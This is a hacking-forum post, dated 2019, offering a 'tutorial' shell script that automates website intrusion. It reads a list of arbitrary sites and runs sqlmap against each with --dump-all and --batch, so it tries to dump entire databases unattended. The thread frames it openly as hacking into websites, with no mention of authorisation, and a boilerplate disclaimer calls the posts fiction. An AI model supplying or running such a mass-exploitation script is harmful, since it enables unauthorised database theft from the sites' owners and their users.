Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial Automate Hacking into Websites with SQLMap and Shell Script filter_list
Author
Message
Automate Hacking into Websites with SQLMap and Shell Script #1
1. Just get a list of websites and save them to a file.
2. save this shell script to a file

Code:
#!/bin/sh
#sunjester / https://underwurld.club
#automating sqlmap 
if [ -z $1 ];
then
        echo "specify a file"
        exit
fi

while IFS='' read -r line || [[ -n "$line" ]]; do
        sqlmap -u $line --dump-all --answers="follow=Y" --batch
done < "$1"

3. execute the shell script in your console with the name of the file with the list of websites you saved

(This script will suppress all the questions and may take longer than a normal sqlmap scan.)

[+] 2 users Like sunjester's post
Reply





Messages In This Thread
Automate Hacking into Websites with SQLMap and Shell Script - by sunjester - 05-19-2019, 12:09 AM



Users browsing this thread: 2 Guest(s)